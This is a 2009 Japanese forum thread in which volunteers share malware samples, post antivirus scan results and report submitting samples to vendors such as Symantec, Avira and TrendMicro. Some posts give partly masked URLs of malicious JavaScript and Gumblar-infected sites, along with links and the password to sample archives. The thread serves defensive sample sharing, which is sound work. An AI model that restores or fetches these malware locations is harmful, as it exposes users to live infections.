Rising解析結果
文件名称:redstone1.exe
病毒名称:Trojan.PSW.Win32.OnlineGame.zxa
解決版本:22.17.00.04
解析は16時頃に終わってたけど、定義更新が22.17.00.03(15時頃)で止まってるので未検出
804:名無しさん@お腹いっぱい。
09/10/13 07:48:53
>>796さん乙です
ウィルスバスター2010スルー
TrendMicroへ提出しました
805:801
09/10/13 09:32:23
>>796
BitDefenderとESETが対応しました
URLリンク(www.virustotal.com)
BitDefender 7.2 2009.10.13 Trojan.Generic.2518937
NOD32 4501 2009.10.12 Win32/PSW.Gamania.NBU
BitDefenderは対応速度が確実に速くなってる・・・というよりもGenericの検出が今までよりもアグレッシブになってるという印象がある
これもGDATAのホワイトリストの影響かな?誤検出を気にしなくていいから強気に出れるとか
そこら辺の関連性も調べてみたい、けど情報がなかなか出なさそう
なんにせよ対応速度が速くなるベンダーが増えるというのはいいことだ
806:名無しさん@お腹いっぱい。
09/10/13 09:39:44
スレリンク(sec板:887番)
ttp : //dfavp.eu/flist.js
a-squared: Virus.JS.FakeAV!IK
avast!: JS:FakeAV-V [Trj]
GDATA: JS:FakeAV-V [Trj]
807:名無しさん@お腹いっぱい。
09/10/13 13:19:01
>>806
>>1
808:名無しさん@お腹いっぱい。
09/10/16 23:39:17
あの「Panda Cloud」 いつまでたっても
InterVideoや7zip関連のファイルを危険なものとして誤検出するんだけど
ここの住人のだれか、もういい加減に誤検出しないようにPanda社に言ってくんない?
おいらはこういう報告したことないので、Pandaに提言することできないし
809:名無しさん@お腹いっぱい。
09/10/16 23:45:13
日本法人があるんだからそれくらいできるだろ
URLリンク(www.ps-japan.co.jp)
810:名無しさん@お腹いっぱい。
09/10/17 13:10:06
URLリンク(www.uploda.biz)
このアプリが反応するんだけど
811:名無しさん@お腹いっぱい。
09/10/17 15:21:22
>>810
おまんちんもどき とかいうIPを晒すやつ
ダウンロードすると晒されるので一応注意
812:名無しさん@お腹いっぱい。
09/10/18 01:50:53
URLリンク(tane.sakuratan.com)
RO攻略関連サイトに埋め込まれた難読化スクリプト
VirusTotal (3/41)
URLリンク(www.virustotal.com)
infected
813:名無しさん@お腹いっぱい。
09/10/18 01:52:16
>>812
忘れてた
Aviraは出します
814:名無しさん@お腹いっぱい。
09/10/18 01:57:36
Avira提出完了
815:名無しさん@お腹いっぱい。
09/10/18 01:57:55
>>812さん乙
Symantecとa-squaredとMalwarebytesとMicrosoftに提出しました
816:名無しさん@お腹いっぱい。
09/10/18 02:19:24
>>812
Rising提出完了
RS20091018011337250113
817:名無しさん@お腹いっぱい。
09/10/18 06:46:08
>>812
McAfee (Active Protection 無効)0/1
McAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
paranormal.php |inconclusive | | |no
818:名無しさん@お腹いっぱい。
09/10/18 07:46:02
>>812さん乙です
ウィルスバスター2010 0/1
TrendMicroへ提出させて頂きました。
819:名無しさん@お腹いっぱい。
09/10/18 15:07:43
>>812
Panda、GDATA2010(BitDefender)、ESET、AVG、F-Secure、Ahnlabへ提出
820:名無しさん@お腹いっぱい。
09/10/18 18:25:22
Rising Internet Security 2010 22.17.06.06 (22.00.01.17)
>>812
paranormal.php: Hack.Exploit.Script.JS.ShellCode.bd
1/1
821:名無しさん@お腹いっぱい。
09/10/19 01:30:14
>>812と同類
URLリンク(tane.sakuratan.com)
infected
うp容量の関係でダミーのテキストファイルを入れてありますが本体はPHPファイルのみです。
すいません。
styles.php (1/41)
URLリンク(www.virustotal.com)
Avira提出済み
822:名無しさん@お腹いっぱい。
09/10/19 01:33:18
>>821
Risingに提出完了
RS20091019002809062308
823:名無しさん@お腹いっぱい。
09/10/19 01:40:35
>>821さん乙
Symantecとa-squaredとMalwarebytesとMicrosoftに提出しました
824:名無しさん@お腹いっぱい。
09/10/19 03:45:16
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★
☆ ☆
★ ☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★ ★
☆ ★fURLリンク(ftp.symantec.com) .☆ ☆
★ ☆fURLリンク(ftp.symantec.com) .★ ★
☆ ★fURLリンク(ftp.symantec.com) .☆ ☆
★ ☆fURLリンク(ftp.symantec.com) ★ ★
☆ ★fURLリンク(ftp.symantec.com) ☆ ☆
★ ☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★ ★
☆ ☆
★ ☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★ ★
☆ ★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆ ☆
★ ☆★fURLリンク(ftp.symantec.com) .☆★ ★
☆ ★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆ ☆
★ ☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★ ★
☆ ☆
★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★
825:名無しさん@お腹いっぱい。
09/10/19 05:52:39
>>1
>>6のAVGがデッドリンクになってるよ
826:名無しさん@お腹いっぱい。
09/10/19 06:19:34
>>821さん乙です
TrendMicroへ提出させて頂きました
827:名無しさん@お腹いっぱい。
09/10/19 08:56:43
>>821 乙
avast! に提出しました。
828:名無しさん@お腹いっぱい。
09/10/19 16:55:10
>>821
McAfee (Active Protection 無効)0/1
McAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
styles.php |inconclusive | | |no
829:名無しさん@お腹いっぱい。
09/10/19 23:06:22
URLリンク(tane.sakuratan.com)
infected
830:名無しさん@お腹いっぱい。
09/10/19 23:14:47
Rising Internet Security 2010 22.18.00.10 (22.00.01.20)
>>829
1-5.exe: Trojan.Win32.Generic.11EE8336
prosto.exe: Trojan.DL.Win32.Nodef.alg
xx.exe: Trojan.Spy.Win32.Ntos.ff
3/4
検体提出完了
RS20091019220821187222
831:名無しさん@お腹いっぱい。
09/10/19 23:38:34
>>829さん乙
Symantecとa-squaredとMalwarebytesに提出しました
832:名無しさん@お腹いっぱい。
09/10/20 00:36:12
>>829
GDATA2010(BitDefender)、TrendMicroへ提出
833:名無しさん@お腹いっぱい。
09/10/20 06:24:13
>>829
McAfee (Active Protection 無効)2/4
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
1-5.exe |inconclusive | | |no
xx.exe |new detection |generic.dx!fyy |Trojan |yes
834:832
09/10/20 09:31:37
>>829
BitDefenderは二つ対応
Install2.exe:Trojan.Generic.2553553
prosto.exe:Trojan.Generic.2554926
835:名無しさん@お腹いっぱい。
09/10/20 14:27:06
>>812,821と同類
URLリンク(tane.sakuratan.com)
infected
markokaldur■com/valgetahekiir/post_config.php (1/40) カスペのみ
URLリンク(www.virustotal.com)
kanto■ac■jp/ → myrussia■kz/includes/regions.php (1/41) カスペのみ
URLリンク(www.virustotal.com)
Avira提出済み
836:名無しさん@お腹いっぱい。
09/10/20 14:35:56
>>835
それって申し訳ないね。別スレで緊急告知されていたので昨日やっつけで少しカスペに送っておいた。
返事がまだないけどその分かな?
837:名無しさん@お腹いっぱい。
09/10/20 14:40:51
>>835さん乙です
ウィルスバスター2010 スルー
TrendMicroへ提出させて頂きました。
未だにtane0530,0531は未対応です。
838:名無しさん@お腹いっぱい。
09/10/20 15:32:33
>>836
VirusTotalは20日分の定義みたいだけどどうかなあ
>>837
Aviraも返事待ちです
同じようなのまとめて定義方法を検討してるのかも
839:名無しさん@お腹いっぱい。
09/10/20 15:36:34
>>835
Symantec、Panda、GDATA2010(avast!&BitDefender)、ESET、AVG、F-Secure、Ahnlabへ提出
Symantecから
filename: post_config.php
machine: Machine
result: See the developer notes
filename: regions.php
machine: Machine
result: See the developer notes
840:名無しさん@お腹いっぱい。
09/10/20 15:39:09
>>837
>>838
Symantec、Panda、ESET、BitDefenderも対応する気配がない
この手の検体は相手にしないのかな?
841:名無しさん@お腹いっぱい。
09/10/20 15:43:28
まぁ自動生成くさいjsだし、包括的にひっかけられないと無駄な努力だと思う。
問題はバイナリもものすごい勢いで変わることだけど、
これも自動生成だとしたら厄介だなぁ(Packerが組み込み簡単なUPXなのも気になる)。
一時期のeCardみたいな…。
842:名無しさん@お腹いっぱい。
09/10/20 15:59:52
Rising Internet Security 2010 22.18.01.03 (22.00.01.22)
>>829
Install2.exe: Trojan.Win32.Generic.11EE980A
解決版本:22.18.01.00
3+1=4/4
>>835
スルー
提出完了
RS20091020145159531983
843:名無しさん@お腹いっぱい。
09/10/20 17:23:10
>>835
McAfee (Active Protection 無効)0/2
未検出分をMcAfeeに提出させて頂きました。
AVERT自動返信
File Name Findings Detection Type Extra
--------------------|------------------------------|----------------------------|------------|-----
post_config.php |inconclusive | | |no
regions.php |inconclusive | | |no
844:名無しさん@お腹いっぱい。
09/10/20 19:04:11
>>835さん乙
Symantecとa-squaredとMalwarebytesとMicrosoftに提出しました
845:名無しさん@お腹いっぱい。
09/10/20 22:57:43
Avira
>>812,821回答
paranormal.php 29.04 KB MALWARE JS/Dldr.Gumblar.w
styles.php 882 Byte CLEAN
846:832
09/10/20 23:24:41
>>829
BitDefender
xx.exe:Backdoor.Bot.107950
3/4
847:832
09/10/20 23:43:32
>>829
TrendMicroから
該当するファイルはわからないけど次のアップデートで対応する模様
TROJ_FAKEAV.BND
TROJ_WALEDAC.AIO
848:名無しさん@お腹いっぱい。
09/10/21 00:07:47
>>812,821,835 comodo提出済み
849:822,842
09/10/21 02:10:25
Rising解析結果
>>821>>835
すべて安全文件
850:名無しさん@お腹いっぱい。
09/10/22 00:13:02
>>835 Avira 回答
post_config.php 837 Byte MALWARE JS/Gumblar.X.3
regions.php 798 Byte MALWARE JS/Gumblar.X.4
851:名無しさん@お腹いっぱい。
09/10/22 00:17:46
>>835
F-Secureから返事来たけどシグネチャ名が記されてないから具体的にここに貼り付けることが出来ない・・・
ただF-Secureに提出したらBitDefenderにも対応されるのかな?
どちらにしてもF-SecureとBitDefender両方に送った方が効率良いね
GDATAにも検体提出先ある?GDATAに検体提出できたらavast!とBitDefenderに直接提出しなくてもavast!とBitDefenderに対応されるかな?
852:名無しさん@お腹いっぱい。
09/10/22 07:27:46
URLリンク(tane.sakuratan.com)
virus
853:名無しさん@お腹いっぱい。
09/10/22 07:32:55
>>852
Risingスルー
提出完了
RS20091022062721687633
854:名無しさん@お腹いっぱい。
09/10/22 08:05:14
>>852さん乙です
ウィルスバスター2010 0/4
提出させて頂きました
855:名無しさん@お腹いっぱい。
09/10/22 10:08:04
>>852さん乙
Symantecとa-squaredとMalwarebytesに提出しました
856:名無しさん@お腹いっぱい。
09/10/22 13:37:07
>>852
avast全部検出
検出名は4つともWin32:Small-MTB[Trj]
857:853
09/10/22 14:59:50
Rising Internet Security 2010 22.18.03.03 (22.00.01.26)
>>852
x1.exe: Trojan.Win32.Generic.11EEBA72 (Trojan.DL.Win32.Tiny.buf)
x1_1.exe: Trojan.Win32.Generic.11EEBA73 (Trojan.DL.Win32.Tiny.bue)
x200.exe: Trojan.Win32.Generic.11EEBA72 (Trojan.DL.Win32.Tiny.buf)
x200_1.exe: Trojan.Win32.Generic.11EEBA74 (Trojan.DL.Win32.Tiny.bue)